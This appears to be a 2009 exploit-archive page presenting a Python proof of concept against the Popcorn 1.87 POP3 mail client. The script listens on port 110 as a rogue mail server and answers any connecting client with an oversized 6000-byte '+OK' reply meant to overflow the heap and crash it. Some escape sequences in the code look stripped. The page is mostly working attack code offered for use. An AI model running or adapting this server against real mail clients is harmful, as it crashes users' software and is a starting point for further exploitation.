Popcorn 1.87 Remote Heap Overflow Exploit PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Popcorn 1.87 Remote Heap Overflow Exploit PoC
# Published : 2009-04-23
# Author : x.CJP.x
# Previous Title : Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption
# Next Title : Xitami Web Server <= 5.0 Remote Denial of Service Exploit

#!/usr/bin/python
#[x]Product download : http://www.ultrafunk.com/products/popcorn/
#[+]Founder : x.CJP.x
#[+]Greeting : His0k4,Sub-Zero,Bibi-info,Aach2006,Youness,Simitch,Halimz,Bibicha.. :=)
#[-]Seni seviyorum, base64_decode('TW91bmE=');

from socket import *
import struct

buffer="x41"*6000 # just random

s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 110))
s.listen(1)
print "[*] Listening on [POP3] 110"
c, addr = s.accept()
print "[*] Connection accepted from: %s" % (addr[0])

c.send("+OK "+buffer+"rn")
c.recv(512)
raw_input("[*] Crashed!nPress key to quit")
c.close()
s.close()

# www.Syue.com [2009-04-23]